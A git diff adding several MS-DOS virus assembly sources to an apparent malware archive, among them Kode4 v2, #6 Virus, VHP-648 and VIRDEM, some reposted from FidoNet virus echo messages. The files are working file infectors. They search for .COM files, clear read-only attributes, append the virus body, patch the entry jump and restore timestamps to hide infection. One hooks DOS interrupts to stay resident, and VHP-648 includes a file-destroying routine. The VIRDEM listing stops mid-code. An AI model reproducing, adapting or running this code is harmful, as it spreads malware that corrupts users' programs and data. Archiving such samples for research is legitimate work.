Mark.Hapershaw@f718.n283.z2.fidonet.org +;>>> Article From Evolution #2 - YAM '92 +; +;Article Title: Kode 4 v2 Virus +;Author: Soltan Griss + + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h +V_Length equ vend-vstart +KODE4 proc far +start label near + db 0E9h,00h,00h + + +vstart equ $ + + mov si,100h ;get si to point to 100 + mov di,102h ;get di to point to 102 +lback: inc di ;increment di + mov ax,word ptr [si] ;si is ponting to ax + cmp word ptr [di],ax ;compare ax with di loc + jne lback ;INE go back and inc di + + + mov ax,word ptr [si+1] + cmp ax,word ptr [di+1] + je lout + jmp lback + +lout: add di,3h ;jmp stored in the end + sub di,(v_length+100h) ;+3 to get to end and - + mov si,di ; +;********************************************************************** +;* +;* The above code can be re-written as follows... +;* The above idea, although it works is very long in code.... +;* when DOS does a load and execute it pushes all registers the last +;* register to be pushed contains the file length. so just subtract +;* the current location +;********************************************************************** +; +; +; +;Host_Off: pop bp +; sub bp,offset host_off +; mov si,bp +; +;*** Before opening any file copy the original three bytes back to 100h +;*** Because they will get overwritten when you check any new files + lea di,temp_buff + add di,si + mov ax,word ptr [di] + mov cl,byte ptr [di+2] + mov di,100h + mov word ptr [di],ax + mov byte ptr [di+2],cl + + + mov ah,4Eh ;Find first Com file + mov dx,offset filename ; offset of "*.com" + add dx,si + int 21h + jnc back + jmp done +Back: + mov ah,43h ;get rid of read only + mov al,0 + mov dx,9eh + int 21h + mov ah,43h + mov al,01 + and cx,11111110b + int 21h + + mov ax,3D02h ;Open file for read/writing + mov dx,9Eh ;get file name from file DTA + int 21h + jnc next + jmp done +next: mov bx,ax ;save handle in bx + mov ah,57h ;get time date + mov al,0 + int 21h + + push cx ;put in stack for later + push dx + + mov ax,4200h ; Move ptr to start of file + xor cx,cx + xor dx,dx + int 21h + + + mov ah,3fh ;load first 3 bytes + mov cx,3 + + mov dx,offset temp_buff + add dx,si + int 21h + + xor cx,cx ;move file pointer to end of file + xor dx,dx + mov ax,4202h + int 21h + sub ax,3 ; Fix for real location + push ax + ; nop ; + ; nop ; used for debugging + ; nop ; + ; nop ; + ; nop + + mov di,offset temp_buff + add di,si + mov word ptr [j_code2+si],ax; Save two bytes in a + ; word [jumpin] + + cmp byte ptr [di],0e9h ;look for a jmp at begining + jne infect + + mov cx,word ptr [di+1] ;check for XXX bytes at end + pop ax + sub ax,v_length + cmp ax, cx ; jump (id string to check) + jne infect + jmp finish + + + +infect: + + xor cx,cx ;move file pointer to begining + xor dx,dx ;to write jump + mov ax,4200h + int 21h + + mov ah,40h ;write jump in first 3 bytes + mov cx,3 + mov dx, offset j_code1 + add dx,si + int 21h + + xor cx,cx ;move file pointer to end of file + xor dx,dx + mov ax, 4202h + int 21h + + mov dx,offset vstart + add dx,si ;Start writing at top of virus + mov cx,(vend-vstart) ; Set for length of virus + mov ah,40h ;Write Data into the file + int 21h + + +Finish: pop dx ;Restore old dates and times + pop cx + mov ah,57h + mov al,01h + int 21h + + mov ah,3Eh ;Close the file + int 21h + + mov ah,4Fh ;Find Next file + int 21h + jc done + jmp back + +done: + mov bp,100h + jmp bp + + +filename db "*.com",0 +DATA db " -=+ Kode4 +=-, The one and ONLY!$" + +j_code1 db 0e9h +j_code2 db 00h,00h +temp_buff db 0cdh,020h,090h ; CD 20 NOP +kode4 endp + +vend equ $ + +seg_a ends + + end start + +;-+- WM v2.09/91-0245 +; + Origin: The PRO-Point on a PRO-BBS and a PRO-*.* ...Ciaro?... (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/3 Enable 32-bit processing +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir64.asm b/MSDOS/Virus.MSDOS.Unknown.vir64.asm new file mode 100644 index 00000000..f6edbaf0 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir64.asm @@ -0,0 +1,395 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 49 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:17 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : NUMBER_6.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Ron Toler, 2:283/718 (06 Nov 94 17:56) +;* To : Fred Lee +;* Subj : NUMBER_6.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Ron.Toler@f718.n283.z2.fidonet.org +;***************************************************************************** +; #6 Virus * +; * +; Assembled with Tasm 2.5 * +; (c) 1992 Trident/Dark Helmet, The Netherlands * +; * +; The author(s) take(s) no responsibility for any damaged caused by * +; this virus. * +;***************************************************************************** + + .RADIX 16 +virus SEGMENT + MODEL SMALL + ASSUME cs:virus, ds:virus, es:virus + ORG 100h + +len EQU OFFSET last - begin + +dummy: DB 0e9h,02h,00h,86h,54h ; Jump to start of + ; viruscode. +begin: CALL start ; make a call to + ; push the IP on the + ; stack. +start: POP bp ; get the IP of the + ; stack. + SUB bp,108h ; adjust BP (=IP) + ; for offset of DATA. + +restore: MOV di,0100h ; copy the original + LEA si,ds:[carrier_begin+bp] ; host begin code back. + MOV cx,05h + REP MOVSB + +check: MOV ah,0a0h ; check if virus + INT 21h ; allready resident. + CMP ax,8654h + JE end_virus + +memory: MOV ax,cs ; DS = Memory Control + DEC ax ; Blok (MCB). + MOV ds,ax + CMP BYTE PTR ds:[0000],5ah ; check first byte if + JNE abort ; last MCB. + MOV ax,ds:[0003] ; decrease memory size. + SUB ax,40 + MOV ds:[0003],AX + + PUSH cs ; restore ds. + POP ds + +install: MOV bx,ax ; ES point where + MOV ax,es ; to copy virus in + ADD ax,bx ; memory. + MOV es,ax + + MOV cx,len ; copy virus to + LEA si,ds:[begin+bp] ; memory. + LEA di,es:0105 ; offset = 105 + REP MOVSB + MOV [virus_segment+bp],es ; store virus_segment + + PUSH cs ; restore es + POP es + +hook_vectors: CLI + + MOV ax,3521h ; hook int 21h + INT 21h + MOV ds,[virus_segment+bp] + MOV old_21h,bx + MOV old_21h+2,es + MOV dx,offset main_virus + MOV ax,2521h + INT 21h + + MOV ax,3512h ; hook int 12h + INT 21h + MOV old_12h,bx + MOV old_12h+2,es + MOV dx,offset new_12h + MOV ax,2512h + INT 21h + + STI + +abort: MOV ax,cs ; restore ds,es + MOV ds,ax + MOV es,ax + +end_virus: MOV bx,0100h ; jump to begin host + PUSH bx + XOR bx,bx + XOR bp,bp + XOR ax,ax + XOR cx,cx + RET + +;***************************************************************************** +; * +; This part will intercept the interuptvectors and copy itself to * +; other host programs * +; * +;***************************************************************************** + +main_virus: PUSHF + CMP ah,0a0h ; check if virus calls + JNE new_21h ; and return id. + MOV ax,8654h + POPF + IRET + +new_21h: PUSH ds ; new interupt 21 + PUSH es ; routine + PUSH di + PUSH si + PUSH ax + PUSH bx + PUSH cx + PUSH dx + PUSH sp + PUSH bp + +check_open: CMP ah,3dh ; check if a file is + JNE check_exec ; being opened + JMP chk_com + +check_exec: CMP ax,04b00h ; check if a file is + JNE continu ; executed + JMP chk_com + +continu: POP bp + POP sp + POP dx ; continu with + POP cx ; interrupt + POP bx + POP ax + POP si + POP di + POP es + POP ds + POPF + JMP DWORD PTR cs:[old_21h] + +chk_com: MOV cs:[name_seg],ds + MOV cs:[name_off],dx + CLD ; check if extension + MOV di,dx ; is COM file + PUSH ds + POP es + MOV al,'.' + REPNE SCASB + CMP WORD PTR es:[di],'OC' + JNE continu + CMP WORD PTR es:[di+2],'M' + JNE continu + + CMP WORD PTR es:[di-7],'MO' ; Check for + JNE error ; COMMAND.COM + CMP WORD PTR es:[di-5],'AM' + JNE error + CMP WORD PTR es:[di-3],'DN' + JE continu + +error: CALL int24h ; take care of error + ; messages + CALL set_atribute ; set atribute for + ; writing + +open_file: MOV ds,cs:[name_seg] ; open file + MOV dx,cs:[name_off] + MOV ax,3d02h + CALL do_int21h + JC close_file + PUSH cs + POP ds + MOV [handle],ax + MOV bx,ax + + CALL get_date + +check_infect: PUSH CS ; check if file + POP DS ; already infect + MOV BX,[handle] + MOV ah,3fh + MOV cx,05h + LEA dx,[carrier_begin] + CALL do_int21h + MOV al, BYTE PTR [carrier_begin]+3 ; look for + MOV ah, BYTE PTR [carrier_begin]+4 ; identification byte's + CMP ax,[initials] + JE save_date + +get_lenght: MOV ax,4200h + CALL move_pointer + MOV ax,4202h + CALL move_pointer + SUB AX,03h + MOV [lenght_file],ax + + CALL write_jmp ; write jump + ; instruction. + CALL write_virus ; write virus + ; body. + +save_date: PUSH CS + POP DS + MOV bx,[handle] + MOV dx,[date] + MOV cx,[time] + MOV ax,5701h + CALL do_int21h + +close_file: MOV bx,[handle] ; close file + MOV ah,3eh + CALL do_int21h + +restore_int24h: MOV dx,cs:[old_24h] ; restore int24 + MOV ds,cs:[old_24h+2] ; for critical + MOV ax,2524h ; error handling + CALL do_int21h + + JMP continu + +new_24h: MOV al,3 + IRET + +new_12h: JMP DWORD PTR cs:[old_12h] + SUB ax,50 + IRET + +;***************************************************************************** + +move_pointer: PUSH cs + POP ds + MOV bx,[handle] + XOR cx,cx + XOR dx,dx + CALL do_int21h + RET + +do_int21h: PUSHF + CALL DWORD PTR cs:[old_21h] + RET + +write_jmp: PUSH CS + POP DS + + MOV ax,4200h ; write jump + CALL move_pointer ; instruction + MOV ah,40h + MOV cx,01h + LEA dx,[jump] + CALL do_int21h + + MOV ah,40h ; write offset of + MOV cx,02h ; jump + LEA dx,[lenght_file] + CALL do_int21h + + MOV ah,40h ; write mark for + MOV cx,02h ; infection + LEA dx,[initials] + CALL do_int21h + RET + +write_virus: PUSH CS + POP DS + + MOV ax,4202h ; write main + CALL move_pointer ; virus body + MOV ah,40 ; at end of + MOV cx,len ; program + MOV dx,105h + CALL do_int21h + RET + +get_date: MOV ax,5700h + CALL do_int21h + PUSH cs + POP ds + MOV [date],dx + MOV [time],cx + RET + +int24h: MOV ax,3524h + CALL do_int21h + MOV cs:[old_24h],bx + MOV cs:[old_24h+2],es + MOV dx,offset new_24h + PUSH CS + POP DS + MOV AX,2524h + +; * Message split, to be continued * +;-+- GEcho 1.00 +; + Origin: The PRO-Point on a PRO-BBS and a PRO-*.* ...Ciaro?... (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/d Warn if duplicate symbols in libraries +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 50 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:17 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : [part 2] NUMBER_6.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Ron Toler, 2:283/718 (06 Nov 94 17:56) +;* To : Fred Lee +;* Subj : [part 2] NUMBER_6.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Ron.Toler@f718.n283.z2.fidonet.org +; * Continuation 1 of a split message * + + CALL do_int21h + RET + +set_atribute: MOV ax,4300h ; get atribute + MOV ds,cs:[name_seg] + MOV dx,cs:[name_off] + CALL do_int21h + + AND cl,0feh ; set atribute + MOV ax,4301h + CALL do_int21h + RET + +;***************************************************************************** + +text db '#6 Virus, Trident/The Netherlands 1992' +old_12h dw 00h,00h +old_21h dw 00h,00h +old_24h dw 00h,00h +carrier_begin db 090h,0cdh,020h,086h,054h +jump db 0e9h +name_seg dw ? +name_off dw ? +virus_segment dw ? +handle dw ? +lenght_file dw ? +date dw ? +time dw ? +initials dw 5486h +last db 090h + +virus ends + end dummy + +;-+- GEcho 1.00 +; + Origin: The PRO-Point on a PRO-BBS and a PRO-*.* ...Ciaro?... (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/dSYM[=VAL] Define symbol SYM = 0, or = value VAL +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.virbub.asm b/MSDOS/Virus.MSDOS.Unknown.virbub.asm new file mode 100644 index 00000000..9b4e2fc8 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.virbub.asm @@ -0,0 +1,331 @@ + name Virus + title Disassembly listing of the VHP-648 virus + .radix 16 +code segment byte public + assume cs:code,ds:code,es:code + org 100h +environ equ 2C + +start: + jmp virus + +message db 'Hello, world!$' + + mov ah,9 + mov dx,offset message + int 21 + int 20 + +virus: + push cx ;Save CX + + mov dx,offset data ;Restore original first instruction +modify equ $-2 ;The instruction above is changed + ; before each contamination + cld + mov si,dx + add si,saveins-data ;Instruction saved there + mov di,offset start + mov cx,3 ;Move 3 bytes + rep movsb ;Do it + mov si,dx ;Keep SI pointed at data + + mov ah,30 ;Get DOS version + int 21 + cmp al,0 ;Less than 2.0? + jne skip1 + jmp exit ;Exit if so + +skip1: + push es ;Save ES + mov ah,2F ;Get current DTA in ES:BX + int 21 + mov word ptr [si+0],bx ;dtaadr + mov word ptr [si+2],es + pop es ;Restore ES + + mov dx,mydta-data + add dx,si + mov ah,1A ;Set DTA + int 21 + + push es ;Save ES & SI + push si + mov es,ds:[environ] ;Environment address + mov di,0 +n_00015A: ;Search 'PATH' in environment + pop si ;Restore data offset in SI + push si + add si,pathstr-data + lodsb + mov cx,8000 ;Maximum 32K in environment + repnz scasb ;Search for first letter ('P') + mov cx,4 ;4 letters in 'PATH' +n_000169: + lodsb ;Search for next char + scasb + jne n_00015A ;If not found, search for next 'P' + loop n_000169 ;Loop until done + pop si ;Restore SI & ES + pop es + + mov [si+16],di ;Save 'PATH' offset in poffs + mov di,si + add di,fname-data ;Point SI & DI at '=' sign + mov bx,si ;Point BX at data area + add si,fname-data + mov di,si + jmp short n_0001BF + +n_000185: + cmp word ptr [si+16],6C ;poffs + jne n_00018F + jmp olddta +n_00018F: + push ds + push si + mov ds,es:[environ] + mov di,si + mov si,es:[di+16] ;poffs + add di,fname-data +n_0001A1: + lodsb + cmp al,';' + je n_0001B0 + cmp al,0 + je n_0001AD + stosb + jmp n_0001A1 +n_0001AD: + mov si,0 +n_0001B0: + pop bx + pop ds + mov [bx+16],si ;poffs + cmp byte ptr [di-1],'\' + je n_0001BF + mov al,'\' ;Add '\' if not already present + stosb + +n_0001BF: + mov [bx+18],di ;Save '=' offset in eqoffs + mov si,bx ;Restore data pointer in SI + add si,allcom-data + mov cx,6 ;6 bytes in ASCIIZ '*.COM' + rep movsb ;Move '*.COM' at fname + mov si,bx ;Restore SI + + mov ah,4E ;Find first file + mov dx,fname-data + add dx,si + mov cx,11b ;Hidden, Read/Only or Normal files + int 21 + jmp short n_0001E3 + +findnext: + mov ah,4F ;Find next file + int 21 +n_0001E3: + jnc n_0001E7 ;If found, try to contaminate it + jmp n_000185 ;Otherwise search in another directory + +n_0001E7: + mov ax,[si+75] ;Check file time + and al,11111b ; (the seconds, more exactly) + cmp al,62d/2 ;Are they 62? + +;If so, file is already contains the virus, search for another: + + je findnext + cmp [si+79],64000d ;Is file size greather than 64,000 bytes? + ja findnext ;If so, search for next file + cmp word ptr [si+79],10d ;Is file size less than 10 bytes? + jb findnext ;If so, search for next file + + mov di,[si+18] ;eqoffs + push si ;Save SI + add si,namez-data ;Point SI at namez +n_000209: + lodsb + stosb + cmp al,0 + jne n_000209 + + pop si ;Restore SI + mov ax,4300 ;Get file attributes + mov dx,fname-data + add dx,si + int 21 + + mov [si+8],cx ;Save them in fattrib + mov ax,4301 ;Set file attributes + +;The next `db's are there because MASM can't assemble +; the instruction `and cx,0FFFE' correctly (the fool!): + + db 081,0E1,0FE,0FF +; and cx,word ptr (not 1) ;Turn off Read Only flag + mov dx,fname-data + add dx,si + int 21 + + mov ax,3D02 ;Open file with Read/Write access + mov dx,fname-data + add dx,si + int 21 + jnc n_00023E + jmp oldattr ;Exit on error + +n_00023E: + mov bx,ax ;Save file handle in BX + mov ax,5700 ;Get file date & time + int 21 + mov [si+4],cx ;Save time in ftime + mov [si+6],dx ;Save date in fdate + + mov ah,2C ;Get system time + int 21 + and dh,111b ;Are seconds a multiple of 8? + +;If so, destroy file (don't contaminate). Now this code is disabled. + jnz 010 + jmp short n_000266 ;CHANGED. Was jnz here + +;Destroy file by rewriting an illegal jmp as first instruction: + + mov ah,40 ;Write to file handle + mov cx,5 ;Write 5 bytes + mov dx,si + add dx,bad_jmp-data ;Write THESE bytes + int 21 ;Do it + jmp short oldtime ;Exit + +;Try to contaminate file: + +;Read first instruction of the file (first 3 bytes) and save it in saveins: + +n_000266: + mov ah,3F ;Read from file handle + mov cx,3 ;Read 3 bytes + mov dx,saveins-data ;Put them there + add dx,si + int 21 + jc oldtime ;Exit on error + cmp ax,3 ;Are really 3 bytes read? + jne oldtime ;Exit if not + +;Move file pointer to end of file: + + mov ax,4202 ;LSEEK from end of file + mov cx,0 ;0 bytes from end + mov dx,0 + int 21 + jc oldtime ;Exit on error + + mov cx,ax ;Get the value of file pointer + sub ax,3 ;Subtract 3 from it to get real code size + mov [si+14d],ax ;Save result in filloc + add cx,data-(virus-100) + mov di,si + sub di,data-modify ;A little self-modification + mov [di],cx + + mov ah,40 ;Write to file handle + mov cx,enddata-virus ;Virus code length as bytes to be written + mov dx,si + sub dx,data-virus ;Now DX points at virus label + int 21 + jc oldtime ;Exit on error + cmp ax,enddata-virus ;Are all bytes written? + jne oldtime ;Exit if not + + mov ax,4200 ;LSEEK from the beginning of the file + mov cx,0 ;Just at the file beginning + mov dx,0 + int 21 + jc oldtime ;Exit on error + +;Rewrite the first instruction of the file with a jump to the virus code: + + mov ah,40 ;Write to file handle + mov cx,3 ;3 bytes to write + mov dx,si + add dx,newjmp-data ;Write THESE bytes + int 21 + +oldtime: + mov dx,[si+6] ;Restore file date + mov cx,[si+4] ; and time + +;And these again are due to the MASM 5.0 foolness: + + db 081,0E1,0E0,0FF + db 081,0C9,01F,000 +; and cx,not 11111b +; or cx,11111b ;Set seconds to 62 (?!) + + mov ax,5701 ;Set file date & time + int 21 + mov ah,3E ;Close file handle + int 21 + +oldattr: + mov ax,4301 ;Set file attributes + mov cx,[si+8] ;They were saved in fattrib + mov dx,fname-data + add dx,si + int 21 + +olddta: + push ds ;Save DS + mov ah,1A ;Set DTA + mov dx,[si+0] ;Restore saved DTA + mov ds,[si+2] + int 21 + pop ds ;Restore DS + +exit: + pop cx ;Restore CX + xor ax,ax ;Clear registers + xor bx,bx + xor dx,dx + xor si,si + mov di,100 ;Jump to CS:100 + push di ; by doing funny RET + xor di,di + ret -1 + +data label byte ;Data section +dtaaddr dd ? ;Disk Transfer Address +ftime dw ? ;File date +fdate dw ? ;File time +fattrib dw ? ;File attribute +saveins db 0EBh,0Fh,90 ;Original first 3 bytes +newjmp db 0E9 ;Code of jmp instruction +filloc dw ? ;File pointer is saved here +allcom db '*.COM',0 ;Filespec to search for +poffs dw ? ;Address of 'PATH' string +eqoffs dw ? ;Address of '=' sign +pathstr db 'PATH=' +fname db 40 dup (' ') ;Path name to search for + +;Disk Transfer Address for Find First / Find Next: + +mydta label byte +drive db ? ;Drive to search for +pattern db 13d dup (?) ;Search pattern +reserve db 7 dup (?) ;Not used +attrib db ? ;File attribute +time dw ? ;File time +date dw ? ;File date +fsize dd ? ;File size +namez db 13d dup (?) ;File name found + +;This replaces the first instruction of a destroyed file: + +bad_jmp db 0EA,0Bh,2,13,58 +enddata label byte + +code ends + end start + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.virdem.asm b/MSDOS/Virus.MSDOS.Unknown.virdem.asm new file mode 100644 index 00000000..af363036 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.virdem.asm @@ -0,0 +1,487 @@ +; +; +; VIRDEM +; +; Created: 16-Mar-87 +; Version: +; Passes: 5 Analysis Options on: QRS +; Copyright by R.Burger 1986,1987 +; +; + +data_1e equ 80h ; (8C04:0080=0) +data_2e equ 9Eh ; (8C04:009E=0) +data_16e equ 0F800h ; (8C04:F800=0) +data_17e equ 0FD00h ; (8C04:FD00=0) + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +virdem proc far + +start: + nop + nop + nop + mov sp,0FE00h + push ax + push bx + push cx + push dx + push bp + push si + push di + push ds + push es + push ss + pushf ; Push flags + mov si,data_1e ; (8C04:0080=0) + lea di,cs:[3BFh] ; Load effective addr + mov cx,20h + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + mov ax,0 + mov es:data_5,ax ; (8C04:038F=0) + mov bl,byte ptr es:data_12+0Dh ; (8C04:0422=30h) + cmp bl,39h ; '9' + je loc_1 ; Jump if equal + inc bl +loc_1: ; xref 8C04:012C + mov byte ptr es:data_12+0Dh,bl ; (8C04:0422=30h) + + mov ah,19h + int 21h ; DOS Services ah=function 19h + ; get default drive al (0=a:) + mov cs:data_10,al ; (8C04:03E1=0) + mov ah,47h ; 'G' + mov dh,0 + add al,1 + mov dl,al + lea si,cs:[3E3h] ; Load effective addr + int 21h ; DOS Services ah=function 47h + ; get present dir,drive dl,1=a: + jmp short loc_3 ; (016D) + db 90h +loc_2: ; xref 8C04:0191, 01A0 + mov ah,40h ; '@' + mov bx,1 + mov cx,34h + nop + lea dx,cs:[57Ch] ; Load effective addr + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx + mov dx,cs:data_6 ; (8C04:0391=600h) + mov cs:data_17e,dx ; (8C04:FD00=0) + jmp loc_12 ; (02E4) + jmp loc_12 ; (02E4) +loc_3: ; xref 8C04:014B + mov dl,0 + mov ah,0Eh + int 21h ; DOS Services ah=function 0Eh + ; set default drive dl (0=a:) + mov ah,3Bh ; ';' + lea dx,cs:[3DFh] ; Load effective addr + int 21h ; DOS Services ah=function 3Bh + ; set current dir, path @ ds:dx + jmp short loc_7 ; (01C9) + db 90h +loc_4: ; xref 8C04:01D4, 01E7 + mov ah,3Bh ; ';' + lea dx,cs:[3DFh] ; Load effective addr + int 21h ; DOS Services ah=function 3Bh + ; set current dir, path @ ds:dx + mov ah,4Eh ; 'N' + mov cx,11h + lea dx,cs:[399h] ; Load effective addr + int 21h ; DOS Services ah=function 4Eh + ; find 1st filenam match @ds:dx + jc loc_2 ; Jump if carry Set + mov bx,cs:data_5 ; (8C04:038F=0) + inc bx + dec bx + jz loc_6 ; Jump if zero +loc_5: ; xref 8C04:01A3 + mov ah,4Fh ; 'O' + int 21h ; DOS Services ah=function 4Fh + ; find next filename match + jc loc_2 ; Jump if carry Set + dec bx + + jnz loc_5 ; Jump if not zero +loc_6: ; xref 8C04:019A + mov ah,2Fh ; '/' + int 21h ; DOS Services ah=function 2Fh + ; get DTA ptr into es:bx + add bx,1Ch + mov word ptr es:[bx],5C20h + inc bx + push ds + mov ax,es + mov ds,ax + mov dx,bx + mov ah,3Bh ; ';' + int 21h ; DOS Services ah=function 3Bh + ; set current dir, path @ ds:dx + pop ds + mov bx,cs:data_5 ; (8C04:038F=0) + inc bx + mov cs:data_5,bx ; (8C04:038F=0) +loc_7: ; xref 8C04:017B + mov ah,4Eh ; 'N' + mov cx,1 + lea dx,cs:[393h] ; Load effective addr + int 21h ; DOS Services ah=function 4Eh + ; find 1st filenam match @ds:dx + jc loc_4 ; Jump if carry Set + mov bx,es:data_5 ; (8C04:038F=0) + cmp bx,0 + je loc_8 ; Jump if equal + jmp short loc_9 ; (01E9) + db 90h +loc_8: ; xref 8C04:01DE, 020D + mov ah,4Fh ; 'O' + int 21h ; DOS Services ah=function 4Fh + ; find next filename match + jc loc_4 ; Jump if carry Set +loc_9: ; xref 8C04:01E0 + mov ah,3Dh ; '=' + mov al,2 + mov dx,data_2e ; (8C04:009E=0) + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + mov bx,ax + mov ah,3Fh ; '?' + mov cx,500h + nop + mov dx,data_16e ; (8C04:F800=0) + nop + int 21h ; DOS Services ah=function 3Fh + ; read file, cx=bytes, to ds:dx + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + mov bx,cs:data_16e ; (8C04:F800=0) + cmp bx,9090h + je loc_8 ; Jump if equal + mov ah,43h ; 'C' + + mov al,0 + mov dx,data_2e ; (8C04:009E=0) + int 21h ; DOS Services ah=function 43h + ; get/set file attrb, nam@ds:dx + mov ah,43h ; 'C' + mov al,1 + and cx,0FEh + int 21h ; DOS Services ah=function 43h + ; get/set file attrb, nam@ds:dx + mov ah,3Dh ; '=' + mov al,2 + mov dx,data_2e ; (8C04:009E=0) + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + mov bx,ax + mov ah,57h ; 'W' + mov al,0 + int 21h ; DOS Services ah=function 57h + ; get/set file date & time + push cx + push dx + mov ah,42h ; 'B' + mov al,2 + mov dx,0 + mov cx,0 + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset + test ax,8000h + jnz loc_10 ; Jump if not zero + cmp ax,500h + nop + ja loc_10 ; Jump if above + call sub_3 ; (0380) +loc_10: ; xref 8C04:0244, 024A + push ax + push dx + mov ah,40h ; '@' + mov cx,500h + nop + mov dx,data_16e ; (8C04:F800=0) + nop + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx + pop dx + pop ax + add ax,100h + mov es:data_4,ax ; (8C04:02BD=0) + add ax,500h + nop + mov dx,cs:data_6 ; (8C04:0391=600h) + mov cs:data_17e,dx ; (8C04:FD00=0) + mov es:data_6,ax ; (8C04:0391=600h) + mov ah,40h ; '@' + mov cx,38h + nop + lea dx,cs:[287h] ; Load effective addr + int 21h ; DOS Services ah=function 40h + + ; write file cx=bytes, to ds:dx + jmp short loc_11 ; (02C0) + db 90h + db 0BFh, 80h, 00h, 8Dh, 36h,0BFh + db 03h,0B9h, 20h, 00h,0F3h,0A4h + db 0E8h, 00h, 00h + +virdem endp + +; +; SUBROUTINE +; + +sub_1 proc near + pop ax + mov bx,27h + nop + add ax,bx + mov si,ax + mov bx,es:[si] + mov si,bx + mov di,offset ds:[100h] ; (8C04:0100=90h) + mov cx,500h + nop + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + popf ; Pop flags + pop ss + pop es + pop ds + pop di + pop si + pop bp + pop dx + pop cx + pop bx + pop ax + mov ax,offset start + push ax + ret +sub_1 endp + +data_4 dw 0 ; xref 8C04:0262 + db 90h +loc_11: ; xref 8C04:0284 + mov ah,42h ; 'B' + mov al,0 + mov dx,0 + mov cx,0 + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset + mov ah,40h ; '@' + mov cx,500h + nop + lea dx,cs:[100h] ; Load effective addr + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx + mov ah,57h ; 'W' + + mov al,1 + pop dx + pop cx + int 21h ; DOS Services ah=function 57h + ; get/set file date & time + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle +loc_12: ; xref 8C04:0167, 016A + nop + call sub_2 ; (036E) + mov bl,byte ptr es:data_12+0Dh ; (8C04:0422=30h) + cmp bl,31h ; '1' + jne loc_13 ; Jump if not equal + mov ah,40h ; '@' + mov bx,1 + mov cx,67h + nop + lea dx,cs:[404h] ; Load effective addr + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx + mov ah,0 + int 21h ; DOS Services ah=function 00h + ; terminate, cs=progm seg prefx +loc_13: ; xref 8C04:02F0 + mov ah,40h ; '@' + mov bx,1 + mov cx,102h + nop + lea dx,cs:[404h] ; Load effective addr + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx + mov ah,2 + mov bl,byte ptr es:data_12+0Dh ; (8C04:0422=30h) + mov dl,bl + int 21h ; DOS Services ah=function 02h + ; display char dl + mov ah,2Ch ; ',' + int 21h ; DOS Services ah=function 2Ch + ; get time, cx=hrs/min, dh=sec + mov ah,0Ch + mov al,1 + int 21h ; DOS Services ah=function 0Ch + ; clear keybd buffer & input al + or dl,30h ; '0' + and dl,bl + cmp dl,al + je loc_14 ; Jump if equal + mov bl,dl + mov ah,2 + mov dl,20h ; ' ' + int 21h ; DOS Services ah=function 02h + ; display char dl + mov dl,3Eh ; '>' + int 21h ; DOS Services ah=function 02h + ; display char dl + mov dl,bl + + int 21h ; DOS Services ah=function 02h + ; display char dl + mov dl,3Ch ; '<' + int 21h ; DOS Services ah=function 02h + ; display char dl + mov ah,40h ; '@' + mov bx,1 + mov cx,3Ch + nop + lea dx,cs:[507h] ; Load effective addr + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx + mov ah,0 + int 21h ; DOS Services ah=function 00h + ; terminate, cs=progm seg prefx +loc_14: ; xref 8C04:0330 + mov ah,40h ; '@' + mov bx,1 + mov cx,37h + nop + lea dx,cs:[544h] ; Load effective addr + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx + mov ax,es:data_17e ; (8C04:FD00=0) + push ax + ret + +; +; SUBROUTINE +; +; Called from: 8C04:02E5 +; + +sub_2 proc near + mov ah,0Eh + mov dl,cs:data_10 ; (8C04:03E1=0) + int 21h ; DOS Services ah=function 0Eh + ; set default drive dl (0=a:) + mov ah,3Bh ; ';' + lea dx,cs:[3E2h] ; Load effective addr + int 21h ; DOS Services 